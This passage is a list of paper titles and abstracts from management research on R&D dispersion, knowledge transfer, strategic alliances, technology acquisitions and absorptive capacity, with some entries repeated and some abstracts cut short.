high-quality reciprocal knowledge transfer. --- paper_title: Distributed R&D, Cross-Regional Knowledge Integration and Quality of Innovative Output paper_content: We explore the impact of geographic dispersion of a firm's R&D activities on the quality of its innovative output. Using data on over half a million patents from 1,127 firms, we find that having geographically distributed R&D per se does not improve the quality of a firm's innovations. In fact, distributed R&D appears to be negatively associated with average value of innovations. This suggests that potential gains from access to diverse ideas and expertise from different locations probably gets offset by difficulty in achieving integration of knowledge across multiple locations. To investigate whether the innovating teams that do manage cross-fertilization of ideas from different locations achieve more valuable innovations, we analyze innovations for which there is evidence of such knowledge cross-fertilization along one of the followings dimensions: knowledge sourcing from remote R&D units, having at least one inventor with cross-regional ties, and having at least one inventor that has recently moved from another region. Analysis along these three dimensions consistently reveals a positive relationship between cross-regional knowledge integration and quality of resulting innovations. More generally, our findings provide new evidence regarding the importance of cross-unit integrative mechanisms for achieving superior performance in multi-unit firms. --- paper_title: Geographic Distribution of R&D Activity: How Does it Affect Innovation Quality? paper_content: I examine the impact of the geographic distribution of R&D activity on the quality of innovation. Through an analysis of patent data from 100 firms in the global semiconductor manufacturing industr... --- paper_title: Knowledge spillovers and the assignment of R&D responsibilities to foreign subsidiaries paper_content: Research on R&D location choice by MNCs has focused largely on host country factor endowments and overlooked the role that the potential to capture and utilize knowledge spillovers from competitors may also play in determining such choices. Using a large‐scale panel database of the foreign subsidiaries of U.S.‐based MNCs in above‐average R&D‐intensive industries, we examine the extent to which external spillover opportunities as well as internal firm‐specific capabilities to utilize such knowledge affect MNCs' new R&D location decisions. Our findings suggest that MNCs appear to anticipate potential spillover opportunities and are discriminating in assessing these opportunities not only across locations but also across categories of competitors within the same location. Further, our findings provide stronger support to predictions regarding the salience of global utilization capacity than they do to predictions regarding the salience of local utilization capacity. Copyright © 2004 John Wiley & Sons, Ltd. --- paper_title: How firms innovate through R&D internationalization? An S-curve hypothesis paper_content: This article examines the effects of R&D internationalization and organizational slack on innovation performance. We suggest that there is an S-shaped relationship between R&D internationalization and innovation performance. Innovation performance increases in the decentralization stage, decreases in the transition stage, and increases again in the recentralization stage. In addition, organizational slack is hypothesized to have a negative moderating effect on the S-shaped relationship. Longitudinal data on 210 Taiwanese firms in the information technology sector during a 10-year period is collected to test the hypotheses. The findings support our prediction. Managerial implications and future research directions are discussed. --- paper_title: Acquiring New Technologies and Capabilities: A Grounded Model of Acquisition Implementation paper_content: In this study, we explore seven in-depth cases of high-technology acquisitions and develop an empirically grounded model of technology and capability transfer during acquisition implementation. We assess how the nature of the acquired firms' knowledge-based resources, as well as multiple dimensions of acquisition implementation, have both independent and interactive effects on the successful appropriation of technologies and capabilities by the acquirer. Our inquiry contributes to the growing body of research examining the transfer of knowledge both between and within organizations. Propositions are developed to help guide further inquiry into the dynamics of acquisition implementation processes in general and, more specifically, the process of acquiring new technologies and capabilities from other firms. --- paper_title: #04-0174 ORGANIZING FOR INNOVATION: MANAGING THE COORDINATION- AUTONOMY DILEMMA IN TECHNOLOGY ACQUISITIONS paper_content: Large, established firms acquiring small, technology-based firms must manage them so as to both exploit their capabilities and technologies in a coordinated way and foster their exploration capacity by preserving their autonomy. We suggest that acquirers can resolve this coordination-autonomy dilemma by recognizing that the effect of structural form on innovation outcomes depends on the developmental stage of acquired firms’ innovation trajectories. Structural integration decreases the likelihood of introducing new products for firms that have not launched products before being acquired and for all firms immediately after acquisition, but these effects disappear as innovation trajectories evolve. --- paper_title: Social Structure of “Coopetition” Within a Multiunit Organization: Coordination, Competition, and Intraorganizational Knowledge Sharing paper_content: Drawing on a social network perspective of organizational coordination, this paper investigates the effectiveness of coordination mechanisms on knowledge sharing in intraorganizational networks that consist of both collaborative and competitive ties among organizational units. Internal knowledge sharing within a multiunit organization requires formal hierarchical structure and informal lateral relations as coordination mechanisms. Using sociometric techniques, this paper analyzes how formal hierarchical structure and informal lateral relations influence knowledge sharing and how interunit competition moderates the association between such coordination mechanisms and knowledge sharing in a large, multiunit company. Results show that formal hierarchical structure, in the form of centralization, has a significant negative effect on knowledge sharing, and informal lateral relations, in the form of social interaction, have a significant positive effect on knowledge sharing among units that compete with each other for market share, but not among units that compete with each other for internal resources. --- paper_title: R&D, organization structure, and the development of corporate technological knowledge paper_content: We explore the link between a firm's organization of research - specifically, its choice to operate a centralized or decentralized R&D structure - and the type of innovation it produces. We propose that by reducing the internal transaction costs associated with R&D coordination across units, centralized R&D will generate innovations that have a larger and broader impact on subsequent technological evolution than will decentralized research. We also propose that by facilitating more distant (capabilities-broadening) search, centralized R&D will generate innovations that draw on a wider range of technologies. Our empirical results provide support for our predictions concerning impact, and mixed results for our predictions concerning breadth of search. We also find that control over research budgets complements direct authority relations in contributing to innovative impact. We propose several extensions of this research. --- paper_title: Beyond local search: boundary-spanning, exploration, and impact in the optical disk industry paper_content: Recognition of the firm's tendency toward local search has given rise to concepts celebrating exploration that overcomes this tendency. To move beyond local search requires that exploration span some boundary, be it organizational or technological. While several studies have encouraged boundary-spanning exploration, few have considered both types of boundaries systematically. In doing so, we create a typology of exploration behaviors: local exploration spans neither boundary, external boundary-spanning exploration spans the firm boundary only, internal boundary-spanning exploration spans the technological boundary only, and radical exploration spans both boundaries. Using this typology, we analyze the impact of knowledge generated by these different types of exploration on subsequent technological evolution. ::: ::: In our study of patenting activity in optical disk technology, we find that exploration that does not span organizational boundaries consistently generates lower impact on subsequent technological evolution. In addition, we find that the impact of exploration on subsequent technological evolution within the optical disk domain is highest when the exploration spans organizational boundaries but not technological boundaries. At the same time, we find that the impact of exploration on subsequent technological development beyond the optical disk domain is greatest when exploration spans both organizational and technological boundaries. Copyright © 2001 John Wiley & Sons, Ltd. --- paper_title: Knowledge flows within multinational corporations paper_content: Pursuing a nodal (i.e., subsidiary) level of analysis, this paper advances and tests an overarching theoretical framework pertaining to intracorporate knowledge transfers within multinational corporations (MNCs). We predicted that (i) knowledge outflows from a subsidiary would be positively associated with value of the subsidiary’s knowledge stock, its motivational disposition to share knowledge, and the richness of transmission channels; and (ii) knowledge inflows into a subsidiary would be positively associated with richness of transmission channels, motivational disposition to acquire knowledge, and the capacity to absorb the incoming knowledge. These predictions were tested empirically with data from 374 subsidiaries within 75 MNCs headquartered in the U.S., Europe, and Japan. Except for our predictions regarding the impact of source unit's motivational disposition on knowledge outflows, the data provide either full or partial support to all of the other elements of our theoretical framework. Copyright © 2000 John Wiley & Sons, Ltd. --- paper_title: Centrifugal and Centripetal Forces in Radical New Product Development Under Time Pressure paper_content: Organizations must be ambidextrous to successfully develop new products—they must act creatively as well as collectively. However, how to do this is not clear. The author analyzes this problem and reviews the literature in terms of two opposing forces: the first increases the quantity and quality of ideas, information, and knowledge available for creative action while the second integrates these things into collective action. The author then models these forces to explain how the coexistence of contradictory structural elements and processes increases the probability of successful development. --- paper_title: Do High Technology Acquirers Become More Innovative paper_content: Drawing on organizational, managerial and financial theories, we explore whether acquirers become more innovative and the factors that can enhance their absorptive and financial capacity to benefit from acquisition. Over a 3-year post-acquisition window, our sample of 2624 high technology US acquisitions records early reverses followed by positive R&D-intensity changes and insignificant R&D productivity changes. Controlling for acquisition endogeneity and deal-specific effects, significant acquirer characteristic effects emerge. In related acquisitions, a large knowledge base tends to increase R&D productivity, consistent with an enhanced capacity to select and absorb targets. In unrelated acquisitions, however, this relationship becomes increasingly negative as knowledge base concentration increases, consistent with arguments for an impaired peripheral vision and core rigidities. High leverage levels raise R&D productivity gains, consistent with enhanced monitoring induced efficiency. However, high leverage growth reduces R&D-intensity, consistent with increased financial constraints and short-termism. --- paper_title: Technological acquisitions and the innovation performance of acquiring firms: a longitudinal study paper_content: This paper examines the impact of acquisitions on the subsequent innovation performance of acquiring firms in the chemicals industry. We distinguish between technological acquisitions, acquisitions in which technology is a component of the acquired firm's assets, and nontechnological acquisitions: acquisitions that do not involve a technological component. We develop a framework relating acquisitions to firm innovation performance and develop a set of measures for quantifying the technological inputs a firm obtains through acquisitions. We find that within technological acquisitions absolute size of the acquired knowledge base enhances innovation performance, while relative size of the acquired knowledge base reduces innovation output. The relatedness of acquired and acquiring knowledge bases has a nonlinear impact on innovation output. Nontechnological acquisitions do not have a significant effect on subsequent innovation output. Copyright © 2001 John Wiley & Sons, Ltd. --- paper_title: Open for innovation: the role of openness in explaining innovation performance among U.K. manufacturing firms paper_content: A central part of the innovation process concerns the way firms go about organizing search for new ideas that have commercial potential. New models of innovation have suggested that many innovative firms have changed the way they search for new ideas, adopting open search strategies that involve the use of a wide range of external actors and sources to help them achieve and sustain innovation. Using a large-scale sample of industrial firms, this paper links search strategy to innovative performance, finding that searching widely and deeply is curvilinearly (taking an inverted U-shape) related to performance. Copyright © 2005 John Wiley & Sons, Ltd. --- paper_title: The influence of corporate acquisitions on the behaviour of key inventors paper_content: The behaviour of key inventors after the acquisition of their company is examined. Key inventors are identified on the basis of their patenting output. They account for a large number of their company?s high-quality patents. The analysis of 43 acquisitions shows that key inventors leave to a substantial extent their company or they significantly reduce their patenting performance after the acquisition. Factors influencing the behaviour of key inventors after acquisitions are identified. Implications for the effective management of acquisitions as well as suggestions for further research are outlined. --- paper_title: Learning Through Acquisitions paper_content: Research on acquisitions has typically focused on acquisitions per se, examining issues such as performance and implementation problems. This study moves beyond that perspective and studies the influence on a firm's later expansions. We argue that exploitation of a firm's knowledge base through “greenfields” eventually makes a firm simple and inert. In contrast, acquisitions may broaden a firm's knowledge base and decrease inertia, enhancing the viability of its later ventures. Over time, firms strike a balance between the use of greenfields and acquisitions. Various implications of this theory—tested with survival analysis and “logit” models—were strongly corroborated. --- paper_title: Geographic Distribution of R&D Activity: How Does it Affect Innovation Quality? paper_content: I examine the impact of the geographic distribution of R&D activity on the quality of innovation. Through an analysis of patent data from 100 firms in the global semiconductor manufacturing industr... --- paper_title: Knowledge Sharing in Organizations: Multiple Networks, Multiple Phases paper_content: Different subsets of social networks may explain knowledge sharing outcomes in different ways. One subset may counteract another subset, and one subset may explain one outcome but not another. We found support for these arguments in an analysis of a sample of 121 new-product development teams. Within-team and interunit networks had different effects on the outcomes of three knowledge-sharing phases: deciding whether to seek knowledge across subunits, search costs, and costs of transfers. These results suggest that research on knowledge sharing can be advanced by studying how multiple networks affect various phases of knowledge sharing. --- paper_title: Distributed R&D, Cross-Regional Knowledge Integration and Quality of Innovative Output paper_content: We explore the impact of geographic dispersion of a firm's R&D activities on the quality of its innovative output. Using data on over half a million patents from 1,127 firms, we find that having geographically distributed R&D per se does not improve the quality of a firm's innovations. In fact, distributed R&D appears to be negatively associated with average value of innovations. This suggests that potential gains from access to diverse ideas and expertise from different locations probably gets offset by difficulty in achieving integration of knowledge across multiple locations. To investigate whether the innovating teams that do manage cross-fertilization of ideas from different locations achieve more valuable innovations, we analyze innovations for which there is evidence of such knowledge cross-fertilization along one of the followings dimensions: knowledge sourcing from remote R&D units, having at least one inventor with cross-regional ties, and having at least one inventor that has recently moved from another region. Analysis along these three dimensions consistently reveals a positive relationship between cross-regional knowledge integration and quality of resulting innovations. More generally, our findings provide new evidence regarding the importance of cross-unit integrative mechanisms for achieving superior performance in multi-unit firms. --- paper_title: National Cultural Distance and Cross-Border Acquisition Performance paper_content: Previous theoretical research has argued that national cultural distance hinders cross-border acquisition performance by increasing the costs of integration. This article tests the alternative hypothesis that national cultural distance enhances cross-border acquisition performance by providing access to the target's and/or the acquirer's diverse set of routines and repertoires embedded in national culture. Using a multi-dimensional measure of national cultural distance and controlling for other effects, we examine a sample of 52 cross-border acquisitions that took place between 1987 and 1992, and find a positive association between national cultural distance and cross-border acquisition performance.© 1998 JIBS. Journal of International Business Studies (1998) 29, 137–158 --- paper_title: How firms innovate through R&D internationalization? An S-curve hypothesis paper_content: This article examines the effects of R&D internationalization and organizational slack on innovation performance. We suggest that there is an S-shaped relationship between R&D internationalization and innovation performance. Innovation performance increases in the decentralization stage, decreases in the transition stage, and increases again in the recentralization stage. In addition, organizational slack is hypothesized to have a negative moderating effect on the S-shaped relationship. Longitudinal data on 210 Taiwanese firms in the information technology sector during a 10-year period is collected to test the hypotheses. The findings support our prediction. Managerial implications and future research directions are discussed. --- paper_title: Explaining the National Cultural Distance Paradox paper_content: Past studies of the relationship between national cultural distance and entry mode choice have produced conflicting results. Some scholars find cultural distance associated with choosing wholly owned modes; others find cultural distance linked to a preference for joint ventures. In this paper we provide both theoretical and empirical evidence to explain the discrepant findings and thus, help to resolve the national cultural distance paradox. --- paper_title: Absorptive Capacity: A New Perspective on Learning and Innovation paper_content: Discusses the notion that the ability to exploit external knowledge is crucial to a firm's innovative capabilities. In addition, it is argued that the ability to evaluate and use outside knowledge is largely a function of the level of prior related knowledge--i.e., absorptive capacity. Prior research has shown that firms that conduct their own research and development (R&D) are better able to use information from external sources. Therefore, it is possible that the absorptive capacity of a firm is created as a byproduct of the firm's R&D investment. A simple model of firm R&D intensity is constructed in a broader context of what applied economists call the three classes of industry-level determinants of R&D intensity: demand, appropriability, and technological opportunity conditions. Several predictions are made, including the notions that absorptive capacity does have a direct effect on R&D spending and spillovers will provide a positive incentive to conduct R&D. All hypotheses are tested using cross-sectional survey data on technological opportunity and appropriability conditions--collected over the period 1975 to 1977 for 1,719 business units--in the American manufacturing sector from Levin et al. (1983, 1987) and the Federal Trade Commission's Line of Business Program data on business unit sales, transfers, and R&D expenditures. Results confirm that firms are sensitive to the characteristics of the learning environment in which they operate and that absorptive capacity does appear to be a part of a firm's decisions regarding resource allocation for innovative activity. Results also suggest that, although the analysis showing a positive effect of spillovers in two industry groups do not represent a direct test of the model, positive absorption incentive associated with spillovers may be sufficiently strong in some cases to more than offset the negative appropribility incentive. (SFL) --- paper_title: External Sources of Innovative Capabilities: The Preferences for Strategic Alliances or Mergers and Acquisitions paper_content: This paper explores the preferences that companies have as they use alternative (quasi) external sources of innovative competencies such as strategic technology alliances, mergers and acquisitions, or a mix of these. These alternatives are studied in the context of distinct industrial, technological and international settings during the first half of the 1990s. Different strategies followed by companies and the role played by routinized sets of preferences are also taken into consideration. The analysis demonstrates that these options are influenced by both different environmental conditions and firm specific circumstances, such as those related to protecting core businesses. --- paper_title: Technological acquisitions and the innovation performance of acquiring firms: a longitudinal study paper_content: This paper examines the impact of acquisitions on the subsequent innovation performance of acquiring firms in the chemicals industry. We distinguish between technological acquisitions, acquisitions in which technology is a component of the acquired firm's assets, and nontechnological acquisitions: acquisitions that do not involve a technological component. We develop a framework relating acquisitions to firm innovation performance and develop a set of measures for quantifying the technological inputs a firm obtains through acquisitions. We find that within technological acquisitions absolute size of the acquired knowledge base enhances innovation performance, while relative size of the acquired knowledge base reduces innovation output. The relatedness of acquired and acquiring knowledge bases has a nonlinear impact on innovation output. Nontechnological acquisitions do not have a significant effect on subsequent innovation output. Copyright © 2001 John Wiley & Sons, Ltd. --- paper_title: Network Structure and Knowledge Transfer: The Effects of Cohesion and Range paper_content: This research considers how different features of informal networks affect knowledge transfer. As a complement to previous research that has emphasized the dyadic tie strength component of informal networks, we focus on how network structure influences the knowledge transfer process. We propose that social cohesion around a relationship affects the willingness and motivation of individuals to invest time, energy, and effort in sharing knowledge with others. We further argue that the network range, ties to different knowledge pools, increases a person's ability to convey complex ideas to heterogeneous audiences. We also examine explanations for knowledge transfer based on absorptive capacity, which emphasizes the role of common knowledge, and relational embeddedness, which stresses the importance of tie strength. We investigate the network effect on knowledge transfer using data from a contract R&D firm. The results indicate that both social cohesion and network range ease knowledge transfer, over and abov... --- paper_title: Don't go it alone: alliance network composition and startups' performance in Canadian biotechnology paper_content: We combine theory and research on alliance networks and on new firms to investigate the impact of variation in startups’ alliance network composition on their early performance. We hypothesize that startups can enhance their early performance by 1) establishing alliances, 2) configuring them into an efficient network that provides access to diverse information and capabilities with minimum costs of redundancy, conflict, and complexity, and 3) judiciously allying with potential rivals that provide more opportunity for learning and less risk of intra-alliance rivalry. An analysis of Canadian biotech startups’ performance provides broad support for our hypotheses, especially as they relate to innovative performance. Overall, our findings show how variation in the alliance networks startups configure at the time of their founding produces significant differences in their early performance, contributing directly to an explanation of how and why firm age and size affect firm performance. We discuss some clear, but challenging, implications for managers of startups. Copyright © 2000 John Wiley & Sons, Ltd. --- paper_title: The Embeddedness of Networks: Institutions, Structural Holes, and Innovativeness in the Fuel Cell Industry paper_content: Plentiful research suggests that embeddedness in alliance networks influences firms’ innovativeness. This research, however, has mostly overlooked the fact that interorganizational ties are themselves embedded within larger institutional contexts that can shape the effects of networks on organizational outcomes. We address this gap in the literature by arguing that national institutions affect the extent to which specific network positions, such as brokerage, influence innovation. We explore this idea in the context of corporatism, which fosters an institutional logic of collaboration that influences the broker’s ability to manage its partnerships and recombine the knowledge residing in its network as well as the extent of knowledge flows among network participants. We argue that differences in institutional logics lead brokerage positions to exert different effects on firm innovativeness. We propose that the firm spanning structural holes obtains the greatest innovation benefits when the firm the broker or its alliance partners are based in highly corporatist countries, or under certain combinations of broker and partner corporatism. We find support for these ideas through a longitudinal study of cross-border fuel cell technology alliance networks involving 109 firms from nine countries between 1981 and 2001. --- paper_title: Knowledge Networks: Explaining Effective Knowledge Sharing in Multiunit Companies paper_content: This paper introduces the concept of knowledge networks to explain why some business units are able to benefit from knowledge residing in other parts of the company while others are not. The core premise of this concept is that a proper understanding of effective interunit knowledge sharing in a multiunit firm requires a joint consideration of relatedness in knowledge content among business units and the network of lateral interunit relations that enables task units to access related knowledge. Results from a study of 120 new product development projects in 41 business units of a large multiunit electronics company showed that project teams obtained more existing knowledge from other units and completed their projects faster to the extent that they had short interunit network paths to units that possessed related knowledge. In contrast, neither network connections nor extent of related knowledge alone explained the amount of knowledge obtained and project completion time. The results also showed a contingent effect of having direct interunit relations in knowledge networks: While established direct relations mitigated problems of transferring noncodified knowledge, they were harmful when the knowledge to be transferred was codified, because they were less needed but still involved maintenance costs. These findings suggest that research on knowledge transfers and synergies in multiunit firms should pursue new perspectives that combine the concepts of network connections and relatedness in knowledge content. --- paper_title: Knowledge Networks as Channels and Conduits: The Effects of Spillovers in the Boston Biotechnology Community paper_content: We contend that two important, nonrelational, features of formal interorganizational networks-geographic propinquity and organizational form-fundamentally alter the flow of information through a network. Within regional economies, contractual linkages among physically proximate organizations represent relatively transparent channels for information transfer because they are embedded in an ecology rich in informal and labor market transmission mechanisms. Similarly, we argue that the spillovers that result from proprietary alliances are a function of the institutional commitments and practices of members of the network. When the dominant nodes in an innovation network are committed to open regimes of information disclosure, the entire structure is characterized by less tightly monitored ties. The relative accessibility of knowledge transferred through contractual linkages to organizations determines whether innovation benefits accrue broadly to membership in a coherent network component or narrowly to centrality. We draw on novel network visualization methods and conditional fixed effects negative binomial regressions to test these arguments for human therapeutic biotechnology firms located in the Boston metropolitan area. --- paper_title: Interorganizational alliances and the performance of firms : A study of growth and innovation rates in a high-technology industry paper_content: This paper investigates the relationship between intercorporate technology alliances and firm performance. It argues that alliances are access relationships, and therefore that the advantages which a focal firm derives from a portfolio of strategic coalitions depend upon the resource profiles of its alliance partners. In particular, large firms and those that possess leading-edge technological resources are posited to be the most valuable associates. The paper also argues that alliances are both pathways for the exchange of resources and signals that convey social status and recognition. Particularly when one of the firms in an alliance is a young or small organization or, more generally, an organization of equivocal quality, alliances can act as endorsements: they build public confidence in the value of an organization's products and services and thereby facilitate the firm's efforts to attract customers and other corporate partners. The findings from models of sales growth and innovation rates in a large sample of semiconductor producers confirm that organizations with large and innovative alliance partners perform better than otherwise comparable firms that lack such partners. Consistent with the status-transfer arguments, the findings also demonstrate that young and small firms benefit more from large and innovative strategic alliance partners than do old and large organizations. Copyright © 2000 John Wiley & Sons, Ltd. --- paper_title: Interorganizational Collaboration and Innovation: Toward a Portfolio Approach* paper_content: In the literature on innovation, interorganizational collaboration has been advanced as beneficial for the innovative performance of firms. At the same time, large-scale empirical evidence for such a relationship is scarce. This article examines whether evidence can be found for the idea that interorganizational collaboration supports the effectiveness of innovation strategies. This article empirically addresses this research question by analyzing data on Belgian manufacturing firms (n=221) collected in the Community Innovation Survey, a biannual survey organized by Eurostat and the European Commission aimed at obtaining insights into the innovation practices and performance of companies within the various European Union (EU) member states. Tobit analyses reveal a positive relationship between interorganizational collaboration and innovative performance. At the same time, the impact on innovative performance differs depending on the nature of the partner(s) involved. These findings strongly suggest the relevance of adopting a portfolio approach to interorganizational collaboration within the context of innovation strategies. --- paper_title: Absorptive capacity, learning, and performance in international joint ventures paper_content: This paper proposes and tests a model of IJV learning and performance that segments absorptive capacity into the three components originally proposed by Cohen and Levinthal (1990). First, trust between an IJV's parents and the IJV's relative absorptive capacity with its foreign parent are suggested to influence its ability to understand new knowledge held by foreign parents. Second, an IJV's learning structures and processes are proposed to influence its ability to assimilate new knowledge from those parents. Third, the IJV's strategy and training competence are suggested to shape its ability to apply the assimilated knowledge. Revisiting the Hungarian IJVs studied by Lyles and Salk (1996) 3 years later, we find support for the knowledge understanding and application predictions, and partial support for the knowledge assimilation prediction. Unexpectedly, our results suggest that trust and management support from foreign parents are associated with IJV performance but not learning. Our model and results offer a new perspective on IJV learning and performance as well as initial insights into how those relationships change over time. Copyright © 2001 John Wiley & Sons, Ltd. --- paper_title: Contingencies in collaborative innovation: matching organisational learning with strategic orientation and environmental munificence paper_content: Matching organisational learning with internal and external contingency factors is important for firms in emerging economies in order to improve their collaborative innovation. This study investigates the fit, in collaborative innovation, between: 1) a firm’s organisational learning; 2) its strategic orientation and the environmental munificence. Using a sample of 136 Chinese firms that engage in R&D collaboration, we examine the fit effects of organisational learning (exploratory learning and exploitative learning) and the contingency factors (strategic orientation and environmental munificence) on collaborative innovation performance, and find that exploratory learning coupled with resource-driven strategic orientation and high environmental munificence enhances collaborative innovation performance, while exploitative learning coupled with opportunity-driven strategic orientation and low environmental munificence enhances collaborative innovation performance. --- paper_title: Network structure and innovation: The leveraging of a dual network as a distinctive relational capability paper_content: This paper employs comparative longitudinal case study research to investigate why and how strong dyadic interfirm ties and two alternative network architectures (a ‘strong ties network’ and a ‘dual network’) impact the innovative capability of the lead firm in an alliance network. I answer these intrinsically cross-level research questions by examining how three design-intensive furnishings manufacturers managed their networks of joint-design alliances with consulting industrial design firms over more than 30 years. Initially, in order to explore the sample lead firms’ alliance behavior, I advance an operationalization of interorganizational tie strength. Next, I unveil the strengths of strong ties and the weaknesses of a strong ties network. Finally, I show that the ability to integrate a large periphery of heterogeneous weak ties and a core of strong ties is a distinctive lead firm’s relational capability, one that provides fertile ground for leading firms in knowledge-intensive alliance networks to gain competitive advantages whose sustainability is primarily based on the dynamic innovative capability resulting from leveraging a dual network architecture. --- paper_title: Social capital, knowledge acquisition, and knowledge exploitation in young technology-based firms paper_content: Employing a sample of 180 entrepreneurial high-technology ventures based in the United Kingdom, we examine the effects of social capital in key customer relationships on knowledge acquisition and knowledge exploitation. Building on the relational view and on social capital and knowledge-based theories, we propose that social capital facilitates external knowledge acquisition in key customer relationships and that such knowledge mediates the relationship between social capital and knowledge exploitation for competitive advantage. Our results indicate that the social interaction and network ties dimensions of social capital are indeed associated with greater knowledge acquisition, but that the relationship quality dimension is negatively associated with knowledge acquisition. Knowledge acquisition is, in turn, positively associated with knowledge exploitation for competitive advantage through new product development, technological distinctiveness, and sales cost efficiency. Further, our results provide evidence that knowledge acquisition plays a mediating role between social capital and knowledge exploitation. Copyright © 2001 John Wiley & Sons, Ltd. --- paper_title: Interfirm Collaboration Networks: The Impact of Large-Scale Network Structure on Firm Innovation paper_content: The structure of alliance networks influences their potential for knowledge creation. Dense local clustering provides information transmission capacity in the network by fostering communication and cooperation. Nonredundant connections contract the distance between firms and give the network greater reach by tapping a wider range of knowledge resources. We propose that firms embedded in alliance networks that exhibit both high clustering and high reach (short average path lengths to a wide range of firms) will have greater innovative output than firms in networks that do not exhibit these characteristics. We find support for this proposition in a longitudinal study of the patent performance of 1,106 firms in 11 industry-level alliance networks. --- paper_title: KNOWLEDGE TRANSFER IN INTRAORGANIZATIONAL NETWORKS: EFFECTS OF NETWORK POSITION AND ABSORPTIVE CAPACITY ON BUSINESS UNIT INNOVATION AND PERFORMANCE paper_content: Inside a multiunit organization, units can learn from each other and benefit from new knowledge developed by other units. Knowledge transfer among organizational units provides opportunities for mutual learning and interunit cooperation that stimulate the creation of new knowledge and, at the same time, contribute to organizational units' ability to innovate (e.g., Kogut & Zander, 1992; Tsai & --- paper_title: Alliance Type, Alliance Experience, and Alliance Management Capability in High-technology Ventures paper_content: Building on the recent theoretical notion that a firm's alliance management capability can be a source of competitive advantage (Dyer and Singh, 1998; Ireland, Hitt, and Vaidyanath, 2002), we empirically investigate the effect of alliance-specific and firm-level factors on a high-technology venture's alliance management capability. We define alliance management capability as a firm's ability to effectively manage multiple alliances. To test the effect of alliance type on alliance management capability, we first establish that the relationship between a high-technology venture's R&D alliances and its new product development is inverted U-shaped, regardless of alliance type (i.e., upstream, horizontal, and downstream alliances). Then, we posit that different alliance types place differential demands on a firm's alliance management capability due to the different types of partners involved and due to the different types of knowledge being transferred. Finally, we argue that firms build an alliance management capability through cumulative experience with strategic alliances over time. We test the effects of alliance type and alliance experience on alliance management capability by drawing on a sample of 2,226 R&D alliances entered into by 325 global biotechnology firms in the twenty-five year period between 1973 and 1997. We find that alliance type and alliance experience moderate the relationship between a high-technology venture's R&D alliances and its new product development. These results provide some preliminary empirical evidence for the existence of an alliance management capability. The results further highlight the relevance of alliance management capability for high-technology ventures since alliance experience appears to be a distinct construct, different from firm age and firm size. Taken together, these results underscore both the ability of a high-tech venture to create a competitive advantage based on its alliance management capability and the risks alliances pose if the firm's alliance activity exceeds its alliance management capability. Managers in high-tech ventures need to consider their current alliance portfolio as well as potential alliances within the context of their firm's alliance management capability. --- paper_title: Post-formation dynamics in strategic alliances paper_content: This paper investigates the occurrence and determinants of post-formation governance changes in strategic alliances, including alterations in alliances' contracts, boards or oversight committees, and monitoring mechanisms. We examine alliances in the biotechnology industry and find that firms' unique alliance experience trajectories affect the likelihood of such ex post adjustments in these partnerships. Transactional features such as the alliance's scope, its division of labor, and the relevance of the collaboration to the parent firm also bear upon alliances' dynamics. We discuss the implications of these findings and how they complement prior research focusing on alliance design or termination at opposite ends of the alliance life cycle. Copyright © 2002 John Wiley & Sons, Ltd. --- paper_title: Why do firms do basic research (with their own money) paper_content: AbstractThe question to be addressed is: Why do private firms perform basic research with their own money? Interest in this question derives from both analytical and utilitarian considerations. There is empirical evidence in the United States, which provides the main context for this paper. Supporting the view that basic research makes a significant contribution to the productivity growth of the economy [4,7]. It is widely held that social returns from basic research are significant and higher than private returns and it is for this reason that most such activities continue to be financed by the taxpayer. This also implies that measures aimed at increasing basic research by the private sector will be welfare improving. In the United States, the federal government in the years since the Second World War has provided the vast majority of all funds devoted to basic research. Although the federal share has been declining in recent years, and although that share is at its lowest level in about 20 years, it still constitutes about two-thirds of the total [10]… --- paper_title: Do High Technology Acquirers Become More Innovative paper_content: Drawing on organizational, managerial and financial theories, we explore whether acquirers become more innovative and the factors that can enhance their absorptive and financial capacity to benefit from acquisition. Over a 3-year post-acquisition window, our sample of 2624 high technology US acquisitions records early reverses followed by positive R&D-intensity changes and insignificant R&D productivity changes. Controlling for acquisition endogeneity and deal-specific effects, significant acquirer characteristic effects emerge. In related acquisitions, a large knowledge base tends to increase R&D productivity, consistent with an enhanced capacity to select and absorb targets. In unrelated acquisitions, however, this relationship becomes increasingly negative as knowledge base concentration increases, consistent with arguments for an impaired peripheral vision and core rigidities. High leverage levels raise R&D productivity gains, consistent with enhanced monitoring induced efficiency. However, high leverage growth reduces R&D-intensity, consistent with increased financial constraints and short-termism. --- paper_title: ABSORPTIVE CAPACITY: A REVIEW, RECONCEPTUALIZATION, AND EXTENSION. paper_content: Researchers have used the absorptive capacity construct to explain various organizational phenomena. In this article we review the literature to identify key dimensions of absorptive capacity and offer a reconceptualization of this construct. Building upon the dynamic capabilities view of the firm, we distinguish between a firm's potential and realized capacity. We then advance a model outlining the conditions when the firm's potential and realized capacities can differentially influence the creation and sustenance of its competitive advantage. --- paper_title: Absorptive capacity and the search for innovation paper_content: This paper examines the link between a firm's absorptive capacity-building activities and the search process for innovation. We propose that the enhanced access to university research enjoyed by firms that engage in basic research and collaborate with university scientists leads to superior search for new inventions and provides advantage in terms of both the timing and quality of search outcomes. Results based on a panel data of pharmaceutical and biotechnology firms support these contentions and suggest that the two research activities are mutually beneficial, but also uncover intriguing differences that suggest differing roles of internally and externally developed knowledge. --- paper_title: KNOWLEDGE TRANSFER IN INTRAORGANIZATIONAL NETWORKS: EFFECTS OF NETWORK POSITION AND ABSORPTIVE CAPACITY ON BUSINESS UNIT INNOVATION AND PERFORMANCE paper_content: Inside a multiunit organization, units can learn from each other and benefit from new knowledge developed by other units. Knowledge transfer among organizational units provides opportunities for mutual learning and interunit cooperation that stimulate the creation of new knowledge and, at the same time, contribute to organizational units' ability to innovate (e.g., Kogut & Zander, 1992; Tsai & --- paper_title: R&D Alliances and Firm Performance: The Impact of Technological Diversity and Alliance Organization on Innovation paper_content: In this paper, I examine the impact of partner technological diversity and alliance organizational form on firm innovative performance. Using a sample of 463 R&D alliances in the telecommunications equipment industry, I find that alliances contribute far more to firm innovation when technological diversity is moderate, rather than low or high. Although this relationship holds irrespective of alliance organization, I find that hierarchical organization, such as an equity joint venture, improves firm benefits from alliances with high levels of technological diversity. Thus, alliance organizational form likely influences partner ability and incentives to share information, which affects performance. --- paper_title: INTER-TEMPORAL ECONOMIES OF SCOPE , ORGANIZATIONAL MODULARITY , AND THE DYNAMICS OF DIVERSIFICATION paper_content: The question of whether corporations add value beyond that created by individual businesses has engendered much debate in recent years. Some of this debate has focused on the pros and cons of related vs. unrelated diversification. A standard explanation of the benefits of related diversification has to do with the ability to obtain intra‐temporal economies of scope from contemporaneous sharing of resources by related businesses within the firm. In contrast, this paper deals with inter‐temporal economies of scope that firms achieve by redeploying resources and capabilities between related businesses over 